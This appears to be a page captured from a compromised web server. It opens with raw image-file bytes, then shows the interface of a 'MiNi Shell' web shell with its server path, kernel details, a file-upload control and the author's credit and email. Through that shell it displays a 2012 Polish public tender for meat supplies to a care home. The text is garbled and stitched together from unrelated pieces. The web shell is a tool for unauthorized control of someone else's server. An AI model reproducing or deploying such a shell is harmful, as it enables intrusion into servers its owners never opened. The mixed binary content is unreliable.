JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121126/472396-N-2012.html

<p class="kh_header"><b>Szadek: Zakup i dostawy produktów mięsnych i mięsa 
dla Domu Pomocy Społecznej w Przatówku,
Przatówek 1,  98-240 Szadek.</b><br>
<b>Numer ogłoszenia: 472396 - 2012; data zamieszczenia: 26.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , Przatówek 1, 98-240 Szadek, woj. łódzkie, tel. 43 675 12 29, faks 43 675 12 29.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.dpsprzatowek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna powiatu.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawy produktów mięsnych i mięsa 
dla Domu Pomocy Społecznej w Przatówku,
Przatówek 1,  98-240 Szadek..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie dotyczy:
Zakupu i dostawy produktów mięsnych i mięsa dla Domu Pomocy Społecznej w Przatówku Przatówek 1, 98-240 Szadek.
Zamówienie zostało podzielone na trzy części.
Oznaczenie zadania za pomocą Wspólnego Słownika Zamówień (CPV):
Część pierwsza.
Mięso wieprzowe i produkty wołowe 15113000-3, 15131600-1
Część druga.
Mięso drobiowe i jego produkty 15112300-9, 15131500-0, 15131135-0
Część trzecia.
Produkty mięsne (wędliny, wyroby blokowe, pieczenie, pasztety) 15131130-5, 15131134-3, 15131310-1
2. Produkty mięsne i mięso, stanowiące przedmiot zamówienia muszą pochodzić z bieżącej produkcji oraz utrzymywać ustalone standardy jakościowe.
3. Zamawiający może zmniejszyć ilość oraz zakres zamawianego asortymentu w zależności od rzeczywistego zapotrzebowania, w ilości nie przekraczającej jednak 20% wartości podanych                 w tabeli pkt 8.
4. Pracownik Domu Pomocy Społecznej w Przatówku odpowiedzialny za składanie zamówień, zamawia ilości asortymentu potrzebne w określonych dniach tygodnia Zamówienie sporządzane jest w formie pisemnej i przesyłane do realizującego faksem, pocztą elektroniczną, w ustalony z Wykonawcą dzień tygodnia. W uzasadnionych przypadkach dopuszcza się możliwość stosowania zamówienia telefonicznego.
5. Wykonawca dowozi zamówioną na dany dzień ilość asortymentu do siedziby zamawiającego swoim środkiem transportu w godzinach od: 700 - 1300.
6. Płatności za zamówiony towar dokonuje się przelewem w terminie 14 dni po otrzymaniu faktury. Wykonawca wystawia i doręcza Zamawiającemu fakturę za towar, najpóźniej dwa dni po jego dostarczeniu.
7. Wybór Wykonawcy nastąpi po zapoznaniu się z dokumentacją przetargową oferentów.
8. W wyborze ofert istotną będzie cena na wyszczególnione w poniższych tabelach artykuły:
Część pierwsza.
Mięso wieprzowe i produkty wołowe
L.p.
Nazwa artykułu
Szacunkowe zapotrzebowanie na artykuł w okresie trwania umowy
1.
Antrykot
20,00 kg
2.
Flaki wołowe suche
50,00 kg
3.
Golonka tylna
30,00 kg
4.
Karczek b/k
215,00 kg
5.
Kości schab.-karczkowe
550,00 kg
6.
Łopatka b/k
600,00 kg
7.
Schab z/k
260,00 kg
8.
Serca wieprzowe
100,00 kg
9.
Słonina
350,00 kg
10.
Wątroba wieprzowa
110,00 kg
11.
Żeberka paski
180,00 kg

Część druga
Mięso drobiowe i jego przetwory
L.p.
Nazwa artykułu
Szacunkowe zapotrzebowanie na artykuł w okresie trwania umowy
1.
Filety z kurczaka
100,00 kg
2.
Kurczaki
100,00 kg
3.
Baton szynkowy
60,00 kg
4.
Rolada z kurczaka
80,00 kg
5.
Pieczeń z kaczki
90,00 kg
6.
Pieczeń wiejska
100,00 kg
7.
Pasztetowa
60,00kg
8.
Kotlet mielony
60,00 kg
9.
Pasztet drobiowy
200,00 kg
10.
Polędwica drobiowa
150,00 kg
11.
Udka
1100,00 kg




Część trzecia
Produkty mięsne /pieczenie, pasztety, wędliny, wyroby blokowe/
L.p
Nazwa artykułu
Szacunkowe zapotrzebowanie na artykuł w okresie trwania umowy
Pieczenie i pasztety
1
Karczek pieczony
160,00 kg
2
Pieczeń rzymska
90,00 kg
3
Pasztet firmowy
200,00 kg
Kiełbasy cienkie
4
Kiełbasa zwyczajna
80,00 kg
5
Kiełbasa wiejska
500,00 kg
6
Kiełbasa biała parzona
34,00 kg
7
Kiełbasa chłopska
100,00 kg
8
Kiełbasa podwawelska
270,00 kg
Kiełbasy grube
9
Kiełbasa krakowska
140,00 kg
10
Kiełbasa piwna
120,00 kg
11
Kiełbasa szynkowa
180,00 kg
12
Kiełbasa żywiecka
71,00 kg
Wędliny podrobowe
13
Kaszanka cienka
110,00 kg
14
Kaszanka gruba
36,00 kg
15
Parówki cienkie
110,00 kg
16
Parówki grube
110,00 kg
17
Mortadela
73,00 kg
18
Mortadela z papryką
85,00 kg
19
Mortadela z pieczarką
85,00 kg
20
Salceson biały
100,00 kg
21
Pasztetowa
100,00 kg
Wędzonki
22
Baleron
102,00 kg
23
Boczek wędzony
60,00 kg
24
Ogonówka
112,00 kg
25
Szynka wiejska
5,00 kg
Wyroby blokowe
26
Mielonka kanapkowa
103,00 kg
27
Mielonka turystyczna
32,00 kg
28
Mielonka tyrolska
100,00 kg
29
Szynka konserwowa
90,00 kg.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.10.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.O udzielenie zamówienia ubiegać się mogą Wykonawcy spełniający warunki określone w art. 22 ust. 1 ustawy PZP a więc:
posiadają uprawnienia do wykonywania określonej działalności lub czynności:
posiadają odpowiednią wiedzę i doświadczenie do wykonania zamówienia:
dysponują odpowiednim potencjałem technicznym:
są w odpowiedniej sytuacji ekonomicznej i finansowej:
2.O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na mocy przepisów art. 24 ust. 1 i 2 ustawy PZP.
3.Zamawiający oceni pozytywnie spełnienie warunków, jeżeli:
Wykonawca złoży oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy PZP</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.O udzielenie zamówienia ubiegać się mogą Wykonawcy spełniający warunki określone w art. 22 ust. 1 ustawy PZP a więc:
posiadają uprawnienia do wykonywania określonej działalności lub czynności:
posiadają odpowiednią wiedzę i doświadczenie do wykonania zamówienia:
dysponują odpowiednim potencjałem technicznym:
są w odpowiedniej sytuacji ekonomicznej i finansowej:
2.O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na mocy przepisów art. 24 ust. 1 i 2 ustawy PZP.
3.Zamawiający oceni pozytywnie spełnienie warunków, jeżeli:
Wykonawca złoży oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy PZP</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.O udzielenie zamówienia ubiegać się mogą Wykonawcy spełniający warunki określone w art. 22 ust. 1 ustawy PZP a więc:
posiadają uprawnienia do wykonywania określonej działalności lub czynności:
posiadają odpowiednią wiedzę i doświadczenie do wykonania zamówienia:
dysponują odpowiednim potencjałem technicznym:
są w odpowiedniej sytuacji ekonomicznej i finansowej:
2.O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na mocy przepisów art. 24 ust. 1 i 2 ustawy PZP.
3.Zamawiający oceni pozytywnie spełnienie warunków, jeżeli:
Wykonawca złoży oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy PZP</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.O udzielenie zamówienia ubiegać się mogą Wykonawcy spełniający warunki określone w art. 22 ust. 1 ustawy PZP a więc:
posiadają uprawnienia do wykonywania określonej działalności lub czynności:
posiadają odpowiednią wiedzę i doświadczenie do wykonania zamówienia:
dysponują odpowiednim potencjałem technicznym:
są w odpowiedniej sytuacji ekonomicznej i finansowej:
2.O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na mocy przepisów art. 24 ust. 1 i 2 ustawy PZP.
3.Zamawiający oceni pozytywnie spełnienie warunków, jeżeli:
Wykonawca złoży oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy PZP</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.O udzielenie zamówienia ubiegać się mogą Wykonawcy spełniający warunki określone w art. 22 ust. 1 ustawy PZP a więc:
posiadają uprawnienia do wykonywania określonej działalności lub czynności:
posiadają odpowiednią wiedzę i doświadczenie do wykonania zamówienia:
dysponują odpowiednim potencjałem technicznym:
są w odpowiedniej sytuacji ekonomicznej i finansowej:
2.O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na mocy przepisów art. 24 ust. 1 i 2 ustawy PZP.
3.Zamawiający oceni pozytywnie spełnienie warunków, jeżeli:
Wykonawca złoży oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy PZP</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewiduje się możliwość zmiany istotnych postanowień zawartej umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru zgodnie z warunkami:
a) w zakresie zmiany wynagrodzenia (ceny podanej w ofercie) w przypadku zmiany
stawek podatku VAT;
b) w zakresie zmiany ilości asortymentu będącego przedmiotem zamówienia (zakresu zamówienia) w przypadku konieczności zmniejszenia ilości zamawianego asortymentu, stosownie do potrzeb, jednak nie więcej niż 20% wartości wymienionych w tabeli Formularza cenowego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.dpsprzatowek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Przatówku
Przatówek 1
98-240 Szadek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.12.2012 godzina 08:30, miejsce: Dom Pomocy Społecznej w Przatówku
Przatówek 1
98-240 Szadek sekretariat pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Mięso wieprzowe i produkty wołowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.
Nazwa artykułu
Szacunkowe zapotrzebowanie na artykuł w okresie trwania umowy
1.
Antrykot
20,00 kg
2.
Flaki wołowe suche
50,00 kg
3.
Golonka tylna
30,00 kg
4.
Karczek b/k
215,00 kg
5.
Kości schab.-karczkowe
550,00 kg
6.
Łopatka b/k
600,00 kg
7.
Schab z/k
260,00 kg
8.
Serca wieprzowe
100,00 kg
9.
Słonina
350,00 kg
10.
Wątroba wieprzowa
110,00 kg
11.
Żeberka paski
180,00 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.30.00-3, 15.13.16.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Mięso drobiowe i jego przetwory.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.
Nazwa artykułu
Szacunkowe zapotrzebowanie na artykuł w okresie trwania umowy
1.
Filety z kurczaka
100,00 kg
2.
Kurczaki
100,00 kg
3.
Baton szynkowy
60,00 kg
4.
Rolada z kurczaka
80,00 kg
5.
Pieczeń z kaczki
90,00 kg
6.
Pieczeń wiejska
100,00 kg
7.
Pasztetowa
60,00kg
8.
Kotlet mielony
60,00 kg
9.
Pasztet drobiowy
200,00 kg
10.
Polędwica drobiowa
150,00 kg
11.
Udka
1100,00 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.23.00-9, 15.13.15.00-0, 15.13.11.34-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Produkty mięsne /pieczenie, pasztety, wędliny, wyroby blokowe/.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p
Nazwa artykułu
Szacunkowe zapotrzebowanie na artykuł w okresie trwania umowy
Pieczenie i pasztety
1
Karczek pieczony
160,00 kg
2
Pieczeń rzymska
90,00 kg
3
Pasztet firmowy
200,00 kg
Kiełbasy cienkie
4
Kiełbasa zwyczajna
80,00 kg
5
Kiełbasa wiejska
500,00 kg
6
Kiełbasa biała parzona
34,00 kg
7
Kiełbasa chłopska
100,00 kg
8
Kiełbasa podwawelska
270,00 kg
Kiełbasy grube
9
Kiełbasa krakowska
140,00 kg
10
Kiełbasa piwna
120,00 kg
11
Kiełbasa szynkowa
180,00 kg
12
Kiełbasa żywiecka
71,00 kg
Wędliny podrobowe
13
Kaszanka cienka
110,00 kg
14
Kaszanka gruba
36,00 kg
15
Parówki cienkie
110,00 kg
16
Parówki grube
110,00 kg
17
Mortadela
73,00 kg
18
Mortadela z papryką
85,00 kg
19
Mortadela z pieczarką
85,00 kg
20
Salceson biały
100,00 kg
21
Pasztetowa
100,00 kg
Wędzonki
22
Baleron
102,00 kg
23
Boczek wędzony
60,00 kg
24
Ogonówka
112,00 kg
25
Szynka wiejska
5,00 kg
Wyroby blokowe
26
Mielonka kanapkowa
103,00 kg
27
Mielonka turystyczna
32,00 kg
28
Mielonka tyrolska
100,00 kg
29
Szynka konserwowa
90,00 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5, 15.13.11.34-3, 15.13.13.10-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com